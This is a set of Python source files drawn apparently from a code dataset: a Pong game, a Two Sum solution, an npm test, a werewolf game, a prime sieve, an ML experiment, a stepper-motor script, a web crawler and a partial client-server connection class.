+ PADDLE_SPEED\r\n if paddle_left_y > (HEIGHT - PADDLE_HEIGHT - y_thresh):\r\n paddle_left_y = HEIGHT - PADDLE_HEIGHT - y_thresh/2-19\r\n elif keysPressed[pygame.K_F11]:\r\n if(FSC):\r\n screen = pygame.display.set_mode(SCREEN_SIZE , pygame.RESIZABLE)\r\n FSC=False\r\n else:\r\n screen = pygame.display.set_mode(SCREEN_SIZE, pygame.FULLSCREEN)\r\n FSC=True\r\n elif keysPressed[pygame.K_F1]:\r\n if(Game!='over'):\r\n Game='start'\r\n score_left = 0\r\n score_right = 0\r\n elif keysPressed[pygame.K_F2]:\r\n Game='stop'\r\n score_left = 0\r\n score_right = 0 \r\n \r\n \r\n \r\n\r\n ##\r\n # Draw arena and score\r\n #\r\n# screen.fill(BLACK)\r\n screen.fill([255, 255, 255])\r\n screen.blit(BackGround.image, BackGround.rect)\r\n# pygame.draw.line(screen, GRAY, [int(0.5 * WIDTH), 0], [int(0.5 * WIDTH), HEIGHT], 1)\r\n text = FONT.render(\"%2s %2s\" % (str(score_left), str(score_right)), 5, light_blue)\r\n textpos = text.get_rect(center = (WIDTH/2 - 10, 60))\r\n screen.blit(text, textpos)\r\n text1 = FONT1.render(\"F1 : Play\", 2, (0,120,120))\r\n textpos1 = text.get_rect(center=(WIDTH/2 - 400, 100))\r\n 
screen.blit(text1, textpos1)\r\n text1 = FONT1.render(\"F2 : Restart\", 2, (0,120,120))\r\n textpos1 = text.get_rect(center=(WIDTH/2 - 400, 150))\r\n screen.blit(text1, textpos1)\r\n text1 = FONT1.render(\"F11 : FullScreen\", 2, (0,120,120))\r\n textpos1 = text.get_rect(center=(WIDTH/2 - 400, 200))\r\n screen.blit(text1, textpos1)\r\n text1 = FONT1.render(\"Esc : Exit\", 2, (0,120,120))\r\n textpos1 = text.get_rect(center=(WIDTH/2 - 400, 250))\r\n screen.blit(text1, textpos1)\r\n\r\n ##\r\n # Draw paddles\r\n #\r\n pygame.draw.rect(screen, PADDLE_LEFT_COLOR, (PADDLE_LEFT_X, paddle_left_y, PADDLE_WIDTH, PADDLE_HEIGHT))\r\n pygame.draw.rect(screen, PADDLE_RIGHT_COLOR, (PADDLE_RIGHT_X, paddle_right_y, PADDLE_WIDTH, PADDLE_HEIGHT))\r\n\r\n ##\r\n # Draw play area\r\n #\r\n# pygame.draw.rect(screen, PLAY_AREA_COLOR, (PLAY_AREA_LEFT_X, PLAY_AREA_LEFT_Y, PLAY_AREA_WIDTH, PLAY_AREA_HEIGHT))\r\n# pygame.draw.rect(screen, PLAY_AREA_COLOR, (PLAY_AREA_RIGHT_X, PLAY_AREA_RIGHT_Y, PLAY_AREA_WIDTH, PLAY_AREA_HEIGHT))\r\n \r\n\r\n ##\r\n # Move ball and update scores\r\n #\r\n\r\n if(score_right==1000 or score_left==1000):\r\n Game='over'\r\n\r\n\r\n if(Game=='over'):\r\n FONT2 = pygame.font.Font(None, 80)\r\n text2 = FONT2.render(\"Game Over\", 2, (200,0,0))\r\n textpos2 = text.get_rect(centerx=WIDTH/2-88,centery=HEIGHT/2)\r\n screen.blit(text2, textpos2)\r\n FONT2 = pygame.font.Font(None, 50)\r\n a=0\r\n if(score_right>score_left):\r\n a=1\r\n if(a==1):\r\n text2 = FONT2.render(\"You Lose You Win\", 2, (200,0,0))\r\n textpos2 = text.get_rect(centerx=WIDTH/2-140, centery=HEIGHT/2+120)\r\n screen.blit(text2, textpos2)\r\n if(a==0):\r\n text2 = FONT2.render(\"You Win You Lose\", 2, (200,0,0))\r\n textpos2 = text.get_rect(centerx=WIDTH/2-140, centery=HEIGHT/2+120)\r\n screen.blit(text2, textpos2) \r\n \r\n \r\n else: \r\n if(Game=='start'):\r\n r = BALL_RADIUS\r\n pos_x = pos_x + speed_x\r\n \r\n if pos_x > WIDTH - x_thresh - 13:\r\n if pos_y >= 240 and pos_y<=480:\r\n if pos_y > (0.5 * HEIGHT):\r\n speed_y = abs(speed_y)\r\n else:\r\n speed_y = -abs(speed_y)\r\n pos_x = int(0.5 * WIDTH)\r\n pos_y = int(0.5 * HEIGHT)\r\n score_left += 1\r\n else: \r\n pos_x = WIDTH - x_thresh - r - 20\r\n speed_x = -speed_x\r\n \r\n \r\n elif pos_x < x_thresh+20:\r\n if pos_y >= 240 and pos_y <= 480:\r\n if pos_y > (0.5 * HEIGHT):\r\n speed_y = abs(speed_y)\r\n else:\r\n speed_y = -abs(speed_y)\r\n pos_x = int(0.5 * WIDTH)\r\n pos_y = int(0.5 * HEIGHT)\r\n score_right += 1\r\n else: \r\n pos_x = x_thresh+20\r\n speed_x = abs(speed_x)\r\n \r\n pos_y = pos_y + speed_y\r\n \r\n if pos_y + r > HEIGHT - y_thresh:\r\n speed_y = -speed_y\r\n elif pos_y - r < y_thresh:\r\n speed_y = abs(speed_y)\r\n \r\n \r\n if pos_x <= (PADDLE_LEFT_X + PADDLE_WIDTH)+r and pos_y >= paddle_left_y and pos_y <= (paddle_left_y + PADDLE_HEIGHT):\r\n pos_x = PADDLE_LEFT_X + PADDLE_WIDTH + r\r\n speed_x = abs(speed_x)\r\n elif pos_x >= PADDLE_RIGHT_X-r and pos_y >= paddle_right_y and pos_y <= (paddle_right_y + PADDLE_HEIGHT):\r\n pos_x = PADDLE_RIGHT_X-r\r\n speed_x = -speed_x \r\n\r\n if(Game=='stop'):\r\n paddle_left_y = int(0.5 * HEIGHT - 0.5 * PADDLE_HEIGHT)\r\n paddle_right_y = paddle_left_y\r\n pos_x = int(0.5 * WIDTH)\r\n pos_y = int(0.5 * HEIGHT)\r\n \r\n pygame.draw.circle(screen, BALL_COLOR, [pos_x, pos_y], BALL_RADIUS)\r\n\r\n ##\r\n # Bounce ball off paddles\r\n #\r\n\r\n\r\n ##\r\n # Tick-tock\r\n #\r\n pygame.display.update()\r\n 
clock.tick(FRAME_RATE)\r\n\r\npygame.quit()\r\n","sub_path":"pong_updated_better.py","file_name":"pong_updated_better.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"114585812","text":"\"\"\"\nTwo Sum\n\"\"\" \n#\n# @lc app=leetcode.cn id=1 lang=python3\n#\n# [1] Two Sum\n# 1. Use a hash map and iterate over nums\n# 2. if target - num not in hashmap --> hashmap[num] = index\n\n\n# @lc code=start\nclass Solution:\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n    # def twoSum(self, nums, target):\n        hashmap = {}\n        for index, num in enumerate(nums): \n            if target - num in hashmap:\n                return [hashmap[target - num], index]\n            else:\n                hashmap[num] = index\n        print(hashmap)\n\n# @lc code=end","sub_path":"Week_02/G20200343040294/LeetCode_1_0294.py","file_name":"LeetCode_1_0294.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"521143949","text":"import pathlib\nfrom unittest import TestCase\nfrom mdbom.bom.npm import NpmProcessor\n\n\nclass TestProcessor(TestCase):\n\n    input_dir = pathlib.Path.cwd() / \"tests\" / \"inputs\"\n\n    def test_construct_npm_urls_success(self):\n        proc = NpmProcessor()\n        packages = proc.get_packages_from_bom(\n            filename=self.input_dir / \"bom-npm.json\"\n        )\n        packages = proc.construct_urls(packages=packages)\n        self.assertEqual(\"eslint\", packages[0].name)\n        self.assertEqual(\"MIT\", packages[0].licenses)\n        self.assertEqual(\"library\", packages[0].kind)\n        self.assertEqual(\"7.27.0\", packages[0].version)\n        self.assertEqual(\n            \"https://www.npmjs.com/package/eslint/v/7.27.0\", packages[0].url\n        )\n","sub_path":"tests/bom/test_npm.py","file_name":"test_npm.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"351907607","text":"import random\nimport socket\n\nclass Werewolf:\n\n    def __init__(self, player):\n        self.userId = player # Passing player's username\n        self.userChar = None # Player's character\n        self.werewolfId = None\n        self.characterList = None\n        self.playerControl = None\n        self.votingControl = None\n        self.victimId = None\n        self.victimChar = None\n        self.dayNightControl = 0\n\n    def controlList(self):\n\n        charLst = [\"villager2\", \"villager0\", \"werewolf\", \"villager1\"]\n        userLst = [\"player0\", \"player1\", \"player2\", \"player3\"]\n        voteCounter = 0\n\n        # Setting playerControl list\n        random.shuffle(charLst)\n        lst1 = {charLst[i]: userLst[i] for i in range(len(charLst))}\n        self.playerControl = lst1\n\n        # Setting votingControl list\n        lst2 = dict.fromkeys(userLst, voteCounter)\n        self.votingControl = lst2\n\n        # Getting player's character\n        for char, userName in self.playerControl.items():\n            if self.userId == userName:\n                self.userChar = char\n                break\n\n        # Getting werewolf playerID\n        self.werewolfId = self.playerControl['werewolf']\n\n    def playingOrNot(self):\n\n        print('''Once upon a time in the remote village, where life is very peaceful. Until one\n        day, an evil force suddenly appeared - THE WEREWOLF. The life in the village has \n        changed upside down since then. This creature is very cunning: On the day they \n        disguise as people, and when the moonlight rises, they show their true color and \n        begin to kill the villagers. 
The lives of the villagers become more stressful \n than ever by the worries, doubts, fear of each other.\\n To solve the situation, \n the villagers meet up to discuss and find out who is the werewolf. The trial is \n taking place in the morning. The most convicted of the villagers will be \n executed, regardless of whether they are a werewolf. Good Luck!''')\n\n select = input(\">> Do you want to play? (y/n) \")\n\n if select == 'y':\n print(\"You are {0} - {1}\".format(self.userId, self.userChar))\n self.checkingMode()\n else:\n print(\"Exit the game!\")\n return\n\n def checkingMode(self):\n\n if self.dayNightControl == 0:\n self.nightMode()\n else:\n self.dayMode()\n\n def nightMode(self):\n print(\"--------NIGHT MODE--------\")\n\n # If user is werewolf => asking who user wants to kill tonight\n if self.userId == self.werewolfId:\n lst = list(self.playerControl.values()) #print alive players\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n select = input(self.userId + \" >> Werewolf, pick someone to kill tonight: \")\n \n if select in self.playerControl.values():\n # Avoid user enter their own userId\n if select != self.userId:\n for char, userName in self.playerControl.items():\n if select == userName:\n print(\">> You chose {0} - {1}\".format(userName, char))\n self.victimId = userName\n self.victimChar = char\n break\n else:\n print(\">> You can't choose yourself!\")\n return self.nightMode()\n else:\n print(\">> Please enter valid input!\")\n return self.nightMode()\n\n # If user is villager => Setup werewolf automatically\n else:\n print(\">> Close your eyes\")\n lst = list(self.playerControl.values())\n lst.remove(self.werewolfId)\n val = random.choice(lst)\n for char, userName in self.playerControl.items():\n if val == userName:\n self.victimId = userName\n self.victimChar = char\n break\n\n self.dayNightControl = 1\n return self.checkingMode()\n\n def dayMode(self):\n print(\"--------DAY MODE--------\")\n\n\n # Werewolf eliminates victim\n if self.victimId in self.playerControl.values():\n print(\">> The werewolf killed {0} - {1}\".format(self.victimId, self.victimChar))\n del self.playerControl[self.victimChar], self.votingControl[self.victimId]\n\n lst = list(self.playerControl.values()) # print alive players\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n\n self.checkWin()\n self.voting()\n self.dayNightControl = 0\n self.checkingMode()\n\n def voting(self):\n\n electId = None\n electChar = None\n lst = list(self.playerControl.values())\n\n if self.userId == self.werewolfId:\n self.ifPlayerIsWolf()\n elif self.userId not in self.playerControl.values():\n self.ifPlayerIsDie()\n else:\n self.ifPlayerIsVillager()\n\n maxVote = sorted(self.votingControl.values())\n for userName, voteCounter in self.votingControl.items():\n if voteCounter == maxVote[-1]:\n electId = userName\n break\n for char, userName in self.playerControl.items():\n if electId == userName:\n electChar = char\n break\n\n print(\">> {0} - {1} is eliminated!\".format(electId, electChar))\n lst.remove(electId) # print alive players\n del self.votingControl[electId], self.playerControl[electChar]\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n\n self.checkWin()\n self.dayNightControl = 0\n self.checkingMode()\n\n def ifPlayerIsWolf(self):\n vote = input(self.userId + \" >> Who do you want to vote? 
\")\n if vote == self.werewolfId:\n print(\">> You can't choose yourself!\")\n return self.ifPlayerIsWolf()\n else:\n self.votingControl[vote] += 1\n \n # Allow other player(s) to vote\n lst = list(self.playerControl.values())\n for numPlayer in range(len(lst)-1): \n val = random.choice(lst)\n self.votingControl[val] +=1\n\n\n def ifPlayerIsVillager(self):\n vote = input(self.userId + \" >> Who do you want to vote? \")\n if vote == self.userId:\n print(self.userId + \" >> You can't choose yourself!\")\n return self.ifPlayerIsVillager()\n else:\n self.votingControl[vote] += 1\n return\n\n def ifPlayerIsDie(self):\n return\n\n def checkWin(self):\n if 'werewolf' not in self.playerControl.keys():\n lst = list(self.playerControl.values())\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n print(\">> Villagers won!\")\n exit(0)\n elif self.playerControl == {'werewolf': self.werewolfId}:\n lst = list(self.playerControl.values())\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n print(\">> Werewolf won!\")\n exit(0)\n else:\n pass\n\nplyList = [\"player0\", \"player1\", \"player2\", \"player3\",]\nuserId = random.choice(plyList)\n\ndef mainGame(player):\n obj = Werewolf(player)\n obj.controlList()\n obj.playingOrNot()\n\nmainGame(userId)\n\n\n\n\n","sub_path":"werewolfGame.py","file_name":"werewolfGame.py","file_ext":"py","file_size_in_byte":7401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"483227925","text":"import os\r\nos.chdir('C:/lab7/Bratun')\r\n\r\ndef get_lines():\r\n with open(r'51.txt', \"r\", encoding=\"utf‐8\") as f:\r\n tmp = f.readlines()\r\n f.close()\r\n return tmp\r\n\r\nlines = get_lines()\r\n\r\nnew_file_lines = []\r\n\r\ndef filelength():\r\n for i in range(len(lines)):\r\n if len(lines[i]) % 2 == 0:\r\n new_file_lines.append(lines[i])\r\n\r\nfilelength()\r\n\r\nwith open(r'52.txt', \"w\", encoding=\"utf‐8\") as f:\r\n for i in new_file_lines:\r\n f.write(i)\r\n f.close()\r\n","sub_path":"I семестр/Програмування (Python)/Лабораторні/Братун 6305/Labs/LABA7/third(2).py","file_name":"third(2).py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"277691438","text":"__author__ = 'joduncan'\n\ndef find(limit):\n # 0. copy Ruby implementation.\n # 1. create dict with keys up to (and including) the limit.\n possible_primes = { key: True for key in range(limit+1) }\n # 2. filter using sieve.\n possible_primes[0] = False\n possible_primes[1] = False\n for possible_prime in sorted(possible_primes.keys()):\n # == True is technically unnecessary, but sometimes it's helpful to be explicit.\n if possible_primes[possible_prime] == True:\n sieve(possible_prime, limit, possible_primes)\n # 3. 
return all keys whose values are true.\n    # slightly more verbose/explicit, but apparently unnecessary (and less pythonic)\n    #return [ key for key in possible_primes.keys() if possible_primes[key] == True ]\n    return [ key for key in possible_primes if possible_primes[key] == True ]\n\ndef sieve(prime, limit, numbers):\n    # no need to go through all numbers up to the limit, the biggest multiple will be around the value of limit/prime\n    multiples = [x for x in range(prime, (limit//prime)+1) if x * prime <= limit]\n    for x in multiples:\n        numbers[prime*x] = False","sub_path":"eulers/10/python/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"256586186","text":"# -*- coding:utf-8 -*-\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n# from sklearn.ensemble import GradientBoostingClassifier\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.datasets import make_classification\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import (RandomTreesEmbedding, RandomForestClassifier,\r\n                              GradientBoostingClassifier)\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import roc_curve\r\nfrom sklearn.pipeline import make_pipeline\r\n\r\ndef getConservation(filename):\r\n    file = open(filename)\r\n    listConservation = []\r\n    str = file.readline()\r\n    for astr in str.split(', '):\r\n        listConservation.append(int(astr))\r\n    return (listConservation)\r\n\r\nlistConservation = getConservation(r'skempiconservation.txt')\r\ndf = pd.read_excel(r'../../excell/450_3.xlsx')\r\n\r\n# print (df)\r\n# gbdt=GradientBoostingClassifier(n_estimators=200)\r\n\r\ny_train = np.arange(400)\r\ny_test = np.arange(50)\r\nlist1 = list(df.ix[0:400, 7])\r\nlist2 = list(df.ix[400:450, 7])\r\nfor i in range(400):\r\n    y_train[i] = list1[i]\r\nfor i in range(50):\r\n    y_test[i] = list2[i]\r\nX_train = np.zeros((400, 6))\r\nX_test = np.zeros((50, 6))\r\nlist3 = []\r\nfor j in range(5):\r\n    # print(df.ix[:, j])\r\n    # print(j)\r\n    list3.append(list(df.ix[:, j + 8]))\r\n# print(list3)\r\n# list3.append(list(df.ix[: , 26]))\r\n# list3.append(list(df.ix[: , 27]))\r\nfor j in range(5):\r\n    for i in range(400):\r\n        X_train[i][j] = list3[j][i]\r\nfor i in range(400):\r\n    X_train[i][5] = listConservation[i]\r\nprint(X_train.shape)\r\nfor j in range(5):\r\n    for i in range(50):\r\n        X_test[i][j] = list3[j][400 + i]\r\nfor i in range(50):\r\n    X_test[i][5] = listConservation[400+i]\r\nX_train = X_train[:, [5]]\r\nx_train = X_train.mean()\r\nX_train = X_train-x_train\r\nX_test = X_test[:, [5]]\r\nx_test = X_test.mean()\r\nX_test = X_test - x_test\r\n\r\n# t = np.arctan2(X_test, y_test)\r\n\r\nplt.plot(listConservation[0:400], list(df.ix[0:399, 7]), 'ro')\r\nplt.axis([-8, 8, 0, 1])\r\nplt.show()\r\n\r\n\r\n# print (X_train.shape, y_train.shape, X_test.shape, y_test.shape)\r\n'''\r\nX_train, X_train_lr, y_train, y_train_lr = train_test_split(X_train,\r\n                                                            y_train,\r\n                                                            test_size=0.5)\r\nn_estimator = 10\r\ngrd = GradientBoostingClassifier(n_estimators=n_estimator)\r\ngrd_enc = OneHotEncoder()\r\ngrd_lm = LogisticRegression()\r\ngrd.fit(X_train, y_train)\r\ngrd_enc.fit(grd.apply(X_train)[:, :, 0])\r\ngrd_lm.fit(grd_enc.transform(grd.apply(X_train_lr)[:, :, 0]), y_train_lr)\r\n\r\ny_pred_grd_lm = grd_lm.predict_proba(\r\n    grd_enc.transform(grd.apply(X_test)[:, :, 0]))[:, 1]\r\nfpr_grd_lm, tpr_grd_lm, _ = roc_curve(y_test, 
y_pred_grd_lm)\r\n\r\n\r\n# The gradient boosted model by itself\r\ny_pred_grd = grd.predict_proba(X_test)[:, 1]\r\nfpr_grd, tpr_grd, _ = roc_curve(y_test, y_pred_grd)\r\n\r\nplt.figure(1)\r\nplt.plot([0, 1], [0, 1], 'k--')\r\n# plt.plot(fpr_rt_lm, tpr_rt_lm, label='RT + LR')\r\n#plt.plot(fpr_rf, tpr_rf, label='RF')\r\n#plt.plot(fpr_rf_lm, tpr_rf_lm, label='RF + LR')\r\nplt.plot(fpr_grd, tpr_grd, label='GBT')\r\n# plt.plot(fpr_grd_lm, tpr_grd_lm, label='GBT + LR')\r\nplt.xlabel('False positive rate')\r\nplt.ylabel('True positive rate')\r\nplt.title('ROC curve')\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\nplt.figure(2)\r\nplt.xlim(0, 1)\r\nplt.ylim(0.8, 1)\r\nplt.plot([0, 1], [0, 1], 'k--')\r\n#plt.plot(fpr_rt_lm, tpr_rt_lm, label='RT + LR')\r\n#plt.plot(fpr_rf, tpr_rf, label='RF')\r\n#plt.plot(fpr_rf_lm, tpr_rf_lm, label='RF + LR')\r\nplt.plot(fpr_grd, tpr_grd, label='GBT')\r\n#plt.plot(fpr_grd_lm, tpr_grd_lm, label='GBT + LR')\r\nplt.xlabel('False positive rate')\r\nplt.ylabel('True positive rate')\r\nplt.title('ROC curve (zoomed in at top left)')\r\nplt.legend(loc='best')\r\nplt.show()\r\n'''\r\nparams = {'n_estimators': 1000, 'max_depth': 3, 'subsample': 0.5,\r\n 'learning_rate': 0.015, 'min_samples_leaf': 1, 'random_state': 3}\r\nclf = GradientBoostingClassifier(**params)\r\n\r\nclf.fit(X_train, y_train)\r\nacc = clf.score(X_test, y_test)\r\nprint(\"Accuracy: {:.4f}\".format(acc))\r\npred = clf.predict(X_test)\r\n# print(pred,y_test)\r\nacc1 = 0\r\ntp = 0\r\nfn = 0\r\nfp = 0\r\n'''\r\nfor i in range(49):\r\n if pred[i] == y_test[i]:\r\n acc1 = acc1 + 1\r\n if pred[i] == 1:\r\n tp = tp + 1\r\n elif pred[i] == 0 and y_test[i] == 1:\r\n fn = fn + 1\r\n else:\r\n fp = fp + 1\r\nprint(tp, fn, fp)\r\nre = tp / (tp + fn)\r\npre = tp / (tp + fp)\r\nfscore = 2 * re * pre / (re + pre)\r\nprint(re, pre, fscore)\r\nprint(\"Accuracy: {:.4f}\".format(acc))\r\n'''","sub_path":"GBDThotspottest.py","file_name":"GBDThotspottest.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"474490932","text":"import urllib.request\nimport requests\nimport random\nimport json\n\ntry:\n import log\nexcept:\n from . import log\ntry:\n import useragents\nexcept ModuleNotFoundError:\n try:\n from . 
import useragents\n    except:\n        'Module useragents does not exist'\ntry:\n    from parseconfig import Parse\nexcept ModuleNotFoundError:\n    try:\n        from .parseconfig import Parse\n    except:\n        'Module parseconfig does not exist'\n\nimport gzip\nimport http.client\nimport urllib.error\nimport urllib.parse\n\n\nclass Crawl:\n\n    def __init__(self, url, timeout=5, encoding='utf8', maxtime=5, data=None, isProxy=False, proxyPools=None, crawlConfig=None, urlConfig=None, dateType='str', **kwargs):\n        self.url = url\n        self.timeout = timeout\n        self.maxtime = maxtime\n        self.encoding = encoding\n        self.data = data\n        self.dataType = dateType\n        self.isProxy = isProxy\n        self.proxyPools = proxyPools\n        self.crawlConfig = crawlConfig\n        self.urlConfig = urlConfig\n\n        self.protocol = url[:url.find(':')]\n        self.kwargs = kwargs\n\n        self.html = None\n\n        self.parse_config()\n        self.run()\n\n    def get_proxy(self):\n        if self.proxyPools:\n            self.isProxy = True\n            self.proxyData = {self.protocol: 'http://' + random.choice(self.proxyPools)}\n        else:\n            self.proxyData = {}\n        return self.proxyData\n\n    def parse_config(self):\n        urlConfig_ = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0'}\n\n        crawlConfig_ = {'timeout': self.timeout,\n                        'encoding': self.encoding,\n                        'maxtime': self.maxtime}\n\n        if not self.urlConfig:\n            urlConfig_.update(\n                {x.replace('_', '-'): self.kwargs[x] for x in self.kwargs if 65 <= ord(str(x)[0]) <= 90 and self.kwargs[x]})\n\n        else:\n            urlConfig_.update({x: self.urlConfig[x] for x in self.urlConfig if 65 <= ord(str(x)[0]) <= 90 and self.urlConfig[x]})\n\n        if not self.crawlConfig:\n            crawlConfig_.update({x: self.kwargs[x] for x in self.kwargs if\n                                 type(x) == str and self.kwargs[x] is not None and x in ['maxtime', 'timeout', 'encoding']})\n        else:\n            crawlConfig_.update({x: self.crawlConfig[x] for x in self.crawlConfig if\n                                 type(x) == str and self.crawlConfig[x] is not None and x in ['maxtime', 'timeout', 'encoding']})\n\n        self.urlConfig, self.crawlConfig = urlConfig_, crawlConfig_\n        # self.urlConfig = list(map(lambda x:(x, self.urlConfig[x]), self.urlConfig))\n\n        try:\n            if Parse.crawlConfig['shuffle']:\n                self.urlConfig['User-Agent'] = random.choice(useragents.userAgents)\n        except:\n            pass\n\n    def run(self):\n        index = 0\n        while index <= self.crawlConfig['maxtime']:\n            try:\n                try:\n                    if self.isProxy or self.proxyPools:\n                        proxy = self.get_proxy()\n                        proxyHandler = urllib.request.ProxyHandler(proxy)\n                        opener = urllib.request.build_opener(proxyHandler)\n                    else:\n                        opener = urllib.request.build_opener()\n                    if not self.data:\n                        req = urllib.request.Request(self.url, headers=self.urlConfig)\n                    else:\n                        if self.dataType == 'json':\n                            data = json.dumps(self.data)\n                        else:\n                            data = urllib.parse.urlencode(self.data)\n                        data = data.encode('utf8')\n                        req = urllib.request.Request(self.url, headers=self.urlConfig, data=data)\n                    res = opener.open(req)\n                    if res.status != 200:\n                        raise Exception('status code is not 200 ! ')\n                    self.html = res.read().decode(self.crawlConfig['encoding'], errors='ignore')\n                    opener.close()\n                    return self.html\n\n                except http.client.BadStatusLine as e:\n                    index += 1\n                    log.error('BadStatusLine Error, URL:%s' % self.url)\n\n                except urllib.error.URLError as e:\n                    index += 0.2\n                    log.error('URLError, URL:%s, ERROR:%s' % (self.url, str(e)))\n\n                except Exception as e:\n                    index += 1\n                    log.error('Other Error, URL:%s, ERROR:%s' % (self.url, str(e)))\n            except Exception as e:\n                index += 1\n                log.critical('...' 
+ str(e))\n log.critical('Index is over than %s times,crawl fail, URL;%s' % (self.crawlConfig['maxtime'], self.url))\n self.html = None\n\n\ncrawl = Crawl\n","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"257609823","text":"import RPi.GPIO as GPIO\r\nimport time\r\nGPIO.setmode(GPIO.BOARD)\r\ncontrol_pins = [7, 11, 13, 15]\r\nfor pin in control_pins:\r\n GPIO.setup(pin, GPIO.OUT)\r\n GPIO.output(pin, 0)\r\nhalfstep_seq = [\r\n [1, 0, 0, 0],\r\n [1, 1, 0, 0],\r\n [0, 1, 0, 0],\r\n [0, 1, 1, 0],\r\n [0, 0, 1, 0],\r\n [0, 0, 1, 1],\r\n [0, 0, 0, 1],\r\n [1, 0, 0, 1]\r\n]\r\nfor i in range(512):\r\n for halfstep in range(8):\r\n for pin in range(4):\r\n GPIO.output(control_pins[pin], halfstep_seq[halfstep][pin])\r\n time.sleep(0.001)\r\n\r\n# Attempt at moving in opposite direction\r\nfor i in range(512):\r\n for halfstep in reversed(range(8)):\r\n for pin in reversed(range(4)):\r\n GPIO.output(control_pins[pin], halfstep_seq[halfstep][pin])\r\n time.sleep(0.001)\r\n\r\nGPIO.cleanup()\r\n","sub_path":"test_stepper_py.py","file_name":"test_stepper_py.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"308909180","text":"import requests\nfrom multiprocessing.pool import ThreadPool\nfrom io import BytesIO\nimport math\nfrom threading import Thread\nimport numpy as np\nfrom random import shuffle\n\nfrom PIL import Image\nimport cv2\nfrom timeit import default_timer as timer\n\nclass Connection(object):\n \"\"\"\n Holds connection to server(s), handles sending and receiving to and from the right one.\n \"\"\"\n\n def __init__(self, settings, history):\n self.settings = settings\n self.history = history\n self.hard_stop = False # hard break of code\n\n # indicates if we are connecting to server(s)\n if self.settings.client_server:\n # init Connection\n\n self.server_ports_suggestions = self.settings.server_ports_list\n self.server_ports_list = []\n self.server_ports_number_of_requests = {}\n self.number_of_server_machines = 0\n self.server_names = {} # port -> server name\n\n # Split machines to attention and final evaluation\n # total N - self.reserve_machines_for_attention will go to final evaluation\n self.reserve_machines_for_attention = self.settings.reserve_machines_for_attention\n\n self.handshake()\n\n if self.settings.precompute_attention_evaluation:\n self.prepare_attention_evaluation_server_lists()\n\n if self.settings.debug_just_handshake:\n self.hard_stop = True\n\n self.pool = ThreadPool()\n\n\n self.times_del = []\n\n def handshake(self):\n if self.settings.verbosity >= 2:\n print(\"Connection init, handshake\")\n\n servers_dedicated_for_precompute = self.reserve_machines_for_attention\n failed_on_ports = []\n for port in self.server_ports_suggestions:\n try:\n HANDSHAKE_API_URL = \"http://localhost:\" + port + \"/handshake\"\n backup_name = port\n payload = {\"client\": \"Hi, I am Bob.\", \"backup_name\": backup_name}\n\n start = timer()\n r = requests.post(HANDSHAKE_API_URL, files=payload).json()\n end = timer()\n\n if r[\"success\"]:\n if self.settings.verbosity >= 1:\n print(\"Connection with server on port\",port,\"established. 
Time:\", (end - start), \"Request data:\", r)\n\n server_name = r[\"server_name\"]\n\n if self.settings.precompute_attention_evaluation:\n if servers_dedicated_for_precompute > 0:\n server_name += '_Att'\n servers_dedicated_for_precompute -= 1\n\n self.server_names[port] = server_name\n\n self.server_ports_list.append(port)\n self.server_ports_number_of_requests[port] = 0\n else:\n failed_on_ports.append(port)\n\n except Exception:\n failed_on_ports.append(port)\n\n if self.settings.verbosity >= 1:\n print(\"FAILED on ports:\", \" \".join(failed_on_ports))\n print(\"SUCCESS on ports:\", \" \".join(self.server_ports_list))\n print(\"machine names:\", self.server_names)\n\n self.number_of_server_machines = len(self.server_ports_list)\n if (self.number_of_server_machines == 0):\n print(\"Connection to all servers failed! Backup solution = turning to local evaluation, no precomputing allowed.\")\n self.settings.client_server = False\n self.settings.precompute_attention_evaluation = False\n if (self.number_of_server_machines < 2):\n print(\"Only one server connected! No precomputing allowed.\")\n self.settings.precompute_attention_evaluation = False\n\n # limiter\n if self.settings.final_evaluation_limit_servers > 0:\n t = 0\n if self.settings.precompute_attention_evaluation:\n t = self.reserve_machines_for_attention\n for_final = len(self.server_ports_list) - t\n #print(for_final,\"vs\",self.settings.final_evaluation_limit_servers)\n\n if self.settings.final_evaluation_limit_servers < for_final:\n self.server_ports_list = self.server_ports_list[0:self.settings.final_evaluation_limit_servers+t]\n print(\"Limiting number of final-evaluation-servers to\",len(self.server_ports_list),\":\",self.server_ports_list)\n self.number_of_server_machines = len(self.server_ports_list)\n\n\n def prepare_attention_evaluation_server_lists(self):\n N = self.number_of_server_machines\n\n if N > 1:\n # now we can split\n self.attention_machines_ports = []\n self.evaluation_machines_ports = []\n\n for i in range(self.reserve_machines_for_attention):\n self.attention_machines_ports.append(self.server_ports_list[i])\n\n for i in range(self.reserve_machines_for_attention, N):\n 